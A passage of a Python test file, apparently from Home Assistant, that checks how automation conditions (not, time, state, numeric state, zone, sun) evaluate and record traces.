{
"alias": "Not Condition",
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "101", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 101.0,
"wanted_state_below": 50.0,
}
}
],
}
)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "50", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{"result": {"result": False, "state": 50.0, "wanted_state_below": 50.0}}
],
}
)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "49", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 49.0}}],
}
)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": True}}],
"conditions/0/entity_id/0": [
{"result": {"result": True, "state": "100", "wanted_state": "100"}}
],
}
)
async def test_not_condition_raises(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Not Condition",
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature2",
"below": 50,
},
],
},
)
# All subconditions raise, the NOT-condition should raise
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
# The first subcondition raises, the second returns False, the NOT-condition
# should raise
hass.states.async_set("sensor.temperature2", 90)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{"result": {"result": False, "state": 90.0, "wanted_state_below": 50.0}}
],
}
)
# The first subcondition raises, the second returns True, the NOT-condition
# should return False
hass.states.async_set("sensor.temperature2", 40)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 40.0}}],
}
)
async def test_not_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "not",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
async def test_time_window(hass):
"""Test time condition windows."""
sixam = "06:00:00"
sixpm = "18:00:00"
test1 = await condition.async_from_config(
hass,
{"alias": "Time Cond", "condition": "time", "after": sixam, "before": sixpm},
)
test2 = await condition.async_from_config(
hass,
{"alias": "Time Cond", "condition": "time", "after": sixpm, "before": sixam},
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=3),
):
assert not test1(hass)
assert test2(hass)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=9),
):
assert test1(hass)
assert not test2(hass)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=15),
):
assert test1(hass)
assert not test2(hass)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=21),
):
assert not test1(hass)
assert test2(hass)
async def test_time_using_input_datetime(hass):
"""Test time conditions using input_datetime entities."""
await async_setup_component(
hass,
"input_datetime",
{
"input_datetime": {
"am": {"has_date": True, "has_time": True},
"pm": {"has_date": True, "has_time": True},
}
},
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.am",
"datetime": str(
dt_util.now()
.replace(hour=6, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.pm",
"datetime": str(
dt_util.now()
.replace(hour=18, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=3),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=9),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=15),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=21),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
# Trigger on PM time
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=18, minute=0, second=0),
):
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(hass, after="input_datetime.pm")
assert not condition.time(hass, before="input_datetime.pm")
# Trigger on AM time
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt_util.now().replace(hour=6, minute=0, second=0),
):
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(hass, after="input_datetime.am")
assert not condition.time(hass, before="input_datetime.am")
with pytest.raises(ConditionError):
condition.time(hass, after="input_datetime.not_existing")
with pytest.raises(ConditionError):
condition.time(hass, before="input_datetime.not_existing")
async def test_state_raises(hass):
"""Test that state raises ConditionError on errors."""
# No entity
with pytest.raises(ConditionError, match="no entity"):
condition.state(hass, entity=None, req_state="missing")
# Unknown entities
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": ["sensor.door_unknown", "sensor.window_unknown"],
"state": "open",
},
)
with pytest.raises(ConditionError, match="unknown entity.*door"):
test(hass)
with pytest.raises(ConditionError, match="unknown entity.*window"):
test(hass)
# Unknown attribute
with pytest.raises(ConditionError, match=r"attribute .* does not exist"):
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.door",
"attribute": "model",
"state": "acme",
},
)
hass.states.async_set("sensor.door", "open")
test(hass)
# Unknown state entity
with pytest.raises(ConditionError, match="input_text.missing"):
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.door",
"state": "input_text.missing",
},
)
hass.states.async_set("sensor.door", "open")
test(hass)
async def test_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"state": "100",
},
],
},
)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 100)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 101)
hass.states.async_set("sensor.temperature_2", 100)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 101)
assert not test(hass)
async def test_multiple_states(hass):
"""Test with multiple states in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "State Condition",
"condition": "state",
"entity_id": "sensor.temperature",
"state": ["100", "200"],
},
],
},
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
hass.states.async_set("sensor.temperature", 200)
assert test(hass)
hass.states.async_set("sensor.temperature", 42)
assert not test(hass)
async def test_state_attribute(hass):
"""Test with state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"state": 200,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 200})
with pytest.raises(ConditionError):
test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 200})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "200"})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 201})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
assert not test(hass)
async def test_state_attribute_boolean(hass):
"""Test with boolean state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "happening",
"state": False,
},
)
hass.states.async_set("sensor.temperature", 100, {"happening": 200})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": True})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"no_happening": 201})
with pytest.raises(ConditionError):
test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": False})
assert test(hass)
async def test_state_using_input_entities(hass):
"""Test state conditions using input_* entities."""
await async_setup_component(
hass,
"input_text",
{
"input_text": {
"hello": {"initial": "goodbye"},
}
},
)
await async_setup_component(
hass,
"input_select",
{
"input_select": {
"hello": {"options": ["cya", "goodbye", "welcome"], "initial": "cya"},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.salut",
"state": [
"input_text.hello",
"input_select.hello",
"salut",
],
},
],
},
)
hass.states.async_set("sensor.salut", "goodbye")
assert test(hass)
hass.states.async_set("sensor.salut", "salut")
assert test(hass)
hass.states.async_set("sensor.salut", "hello")
assert not test(hass)
await hass.services.async_call(
"input_text",
"set_value",
{
"entity_id": "input_text.hello",
"value": "hi",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "hi")
assert test(hass)
hass.states.async_set("sensor.salut", "cya")
assert test(hass)
await hass.services.async_call(
"input_select",
"select_option",
{
"entity_id": "input_select.hello",
"option": "welcome",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "welcome")
assert test(hass)
async def test_numeric_state_known_non_matching(hass):
"""Test that numeric_state doesn't match on known non-matching states."""
hass.states.async_set("sensor.temperature", "unavailable")
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"above": 0,
},
)
# Unavailable state
assert not test(hass)
# Unknown state
hass.states.async_set("sensor.temperature", "unknown")
assert not test(hass)
async def test_numeric_state_raises(hass):
"""Test that numeric_state raises ConditionError on errors."""
# Unknown entities
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_unknown", "sensor.humidity_unknown"],
"above": 0,
},
)
with pytest.raises(ConditionError, match="unknown entity.*temperature"):
test(hass)
with pytest.raises(ConditionError, match="unknown entity.*humidity"):
test(hass)
# Unknown attribute
with pytest.raises(ConditionError, match=r"attribute .* does not exist"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"attribute": "temperature",
"above": 0,
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Template error
with pytest.raises(ConditionError, match="ZeroDivisionError"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"value_template": "{{ 1 / 0 }}",
"above": 0,
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Bad number
with pytest.raises(ConditionError, match="cannot be processed as a number"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"above": 0,
},
)
hass.states.async_set("sensor.temperature", "fifty")
test(hass)
# Below entity missing
with pytest.raises(ConditionError, match="'below' entity"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": "input_number.missing",
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Below entity not a number
with pytest.raises(
ConditionError,
match="'below'.*input_number.missing.*cannot be processed as a number",
):
hass.states.async_set("input_number.missing", "number")
test(hass)
# Above entity missing
with pytest.raises(ConditionError, match="'above' entity"):
test = await condition.async_from_config(
hass,
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"above": "input_number.missing",
},
)
hass.states.async_set("sensor.temperature", 50)
test(hass)
# Above entity not a number
with pytest.raises(
ConditionError,
match="'above'.*input_number.missing.*cannot be processed as a number",
):
hass.states.async_set("input_number.missing", "number")
test(hass)
async def test_numeric_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "Numeric State Condition",
"condition": "numeric_state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 49)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 50)
hass.states.async_set("sensor.temperature_2", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 50)
assert not test(hass)
async def test_numeric_state_attribute(hass):
"""Test with numeric state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 10})
with pytest.raises(ConditionError):
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 49})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "49"})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 51})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
with pytest.raises(ConditionError):
assert test(hass)
async def test_numeric_state_using_input_number(hass):
"""Test numeric_state conditions using input_number entities."""
await async_setup_component(
hass,
"input_number",
{
"input_number": {
"low": {"min": 0, "max": 255, "initial": 10},
"high": {"min": 0, "max": 255, "initial": 100},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": "input_number.high",
"above": "input_number.low",
},
],
},
)
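# The above/below thresholds are read from the input_number entities each time the condition is evaluated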
hass.states.async_set("sensor.temperature", 42)
assert test(hass)
hass.states.async_set("sensor.temperature", 10)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
hass.states.async_set("input_number.high", "unknown")
assert not test(hass)
hass.states.async_set("input_number.high", "unavailable")
assert not test(hass)
await hass.services.async_call(
"input_number",
"set_value",
{
"entity_id": "input_number.high",
"value": 101,
},
blocking=True,
)
assert test(hass)
hass.states.async_set("input_number.low", "unknown")
assert not test(hass)
hass.states.async_set("input_number.low", "unavailable")
assert not test(hass)
with pytest.raises(ConditionError):
condition.async_numeric_state(
hass, entity="sensor.temperature", below="input_number.not_exist"
)
with pytest.raises(ConditionError):
condition.async_numeric_state(
hass, entity="sensor.temperature", above="input_number.not_exist"
)
async def test_zone_raises(hass):
"""Test that zone raises ConditionError on errors."""
test = await condition.async_from_config(
hass,
{
"condition": "zone",
"entity_id": "device_tracker.cat",
"zone": "zone.home",
},
)
with pytest.raises(ConditionError, match="no zone"):
condition.zone(hass, zone_ent=None, entity="sensor.any")
with pytest.raises(ConditionError, match="unknown zone"):
test(hass)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
with pytest.raises(ConditionError, match="no entity"):
condition.zone(hass, zone_ent="zone.home", entity=None)
with pytest.raises(ConditionError, match="unknown entity"):
test(hass)
hass.states.async_set(
"device_tracker.cat",
"home",
{"friendly_name": "cat"},
)
with pytest.raises(ConditionError, match="latitude"):
test(hass)
hass.states.async_set(
"device_tracker.cat",
"home",
{"friendly_name": "cat", "latitude": 2.1},
)
with pytest.raises(ConditionError, match="longitude"):
test(hass)
hass.states.async_set(
"device_tracker.cat",
"home",
{"friendly_name": "cat", "latitude": 2.1, "longitude": 1.1},
)
# All okay, now test multiple failed conditions
assert test(hass)
test = await condition.async_from_config(
hass,
{
"condition": "zone",
"entity_id": ["device_tracker.cat", "device_tracker.dog"],
"zone": ["zone.home", "zone.work"],
},
)
with pytest.raises(ConditionError, match="dog"):
test(hass)
with pytest.raises(ConditionError, match="work"):
test(hass)
hass.states.async_set(
"zone.work",
"zoning",
{"name": "work", "latitude": 20, "longitude": 10, "radius": 25000},
)
hass.states.async_set(
"device_tracker.dog",
"work",
{"friendly_name": "dog", "latitude": 20.1, "longitude": 10.1},
)
assert test(hass)
async def test_zone_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "Zone Condition",
"condition": "zone",
"entity_id": ["device_tracker.person_1", "device_tracker.person_2"],
"zone": "zone.home",
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 20.1, "longitude": 10.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert not test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 20.1, "longitude": 10.1},
)
assert not test(hass)
async def test_multiple_zones(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "zone",
"entity_id": "device_tracker.person",
"zone": ["zone.home", "zone.work"],
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"zone.work",
"zoning",
{"name": "work", "latitude": 20.1, "longitude": 10.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 20.1, "longitude": 10.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 50.1, "longitude": 20.1},
)
assert not test(hass)
async def test_extract_entities():
"""Test extracting entities."""
assert condition.async_extract_entities(
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_2",
"below": 110,
},
{
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_3",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_4",
"below": 110,
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_5",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_6",
"below": 110,
},
],
},
{
"condition": "state",
"entity_id": ["sensor.temperature_7", "sensor.temperature_8"],
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_9", "sensor.temperature_10"],
"below": 110,
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
) == {
"sensor.temperature",
"sensor.temperature_2",
"sensor.temperature_3",
"sensor.temperature_4",
"sensor.temperature_5",
"sensor.temperature_6",
"sensor.temperature_7",
"sensor.temperature_8",
"sensor.temperature_9",
"sensor.temperature_10",
}
async def test_extract_devices():
"""Test extracting devices."""
assert (
condition.async_extract_devices(
{
"condition": "and",
"conditions": [
{"condition": "device", "device_id": "abcd", "domain": "light"},
{"condition": "device", "device_id": "qwer", "domain": "switch"},
{
"condition": "state",
"entity_id": "sensor.not_a_device",
"state": "100",
},
{
"condition": "not",
"conditions": [
{
"condition": "device",
"device_id": "abcd_not",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_not",
"domain": "switch",
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "device",
"device_id": "abcd_or",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_or",
"domain": "switch",
},
],
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
)
== {"abcd", "qwer", "abcd_not", "qwer_not", "abcd_or", "qwer_or"}
)
async def test_condition_template_error(hass):
"""Test invalid template."""
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ undefined.state }}"}
)
with pytest.raises(ConditionError, match="template"):
test(hass)
async def test_condition_template_invalid_results(hass):
"""Test template condition render false with invalid results."""
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 'string' }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 10.1 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 42 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ [1, 2, 3] }}"}
)
assert not test(hass)
def _find_run_id(traces, trace_type, item_id):
"""Find newest run_id for a script or automation."""
for _trace in reversed(traces):
if _trace["domain"] == trace_type and _trace["item_id"] == item_id:
return _trace["run_id"]
return None
async def assert_automation_condition_trace(hass_ws_client, automation_id, expected):
"""Test the result of automation condition."""
id = 1
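# Each websocket command needs its own monotonically increasing message id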
def next_id():
nonlocal id
id += 1
return id
client = await hass_ws_client()
# List traces
await client.send_json(
{"id": next_id(), "type": "trace/list", "domain": "automation"}
)
response = await client.receive_json()
assert response["success"]
run_id = _find_run_id(response["result"], "automation", automation_id)
# Get trace
await client.send_json(
{
"id": next_id(),
"type": "trace/get",
"domain": "automation",
"item_id": "sun",
"run_id": run_id,
}
)
response = await client.receive_json()
assert response["success"]
trace = response["result"]
assert len(trace["trace"]["condition/0"]) == 1
condition_trace = trace["trace"]["condition/0"][0]["result"]
assert condition_trace == expected
async def test_if_action_before_sunrise_no_offset(hass, hass_ws_client, calls):
"""
Test if action was before sunrise.
Before sunrise is true from midnight until sunrise, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 9, 16, 13, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 9, 16, 13, 33, 18, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
async def test_if_action_after_sunrise_no_offset(hass, hass_ws_client, calls):
"""
Test if action was after sunrise.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise - 1s -> 'after sunrise' not true
now = datetime(2015, 9, 16, 13, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
# now = sunrise + 1s -> 'after sunrise' true
now = datetime(2015, 9, 16, 13, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
async def test_if_action_before_sunrise_with_offset(hass, hass_ws_client, calls):
"""
Test if action was before sunrise with offset.
Before sunrise is true from midnight until sunrise, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": SUN_EVENT_SUNRISE,
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise + 1s + 1h -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunrise + 1h -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 33, 18, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC midnight -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
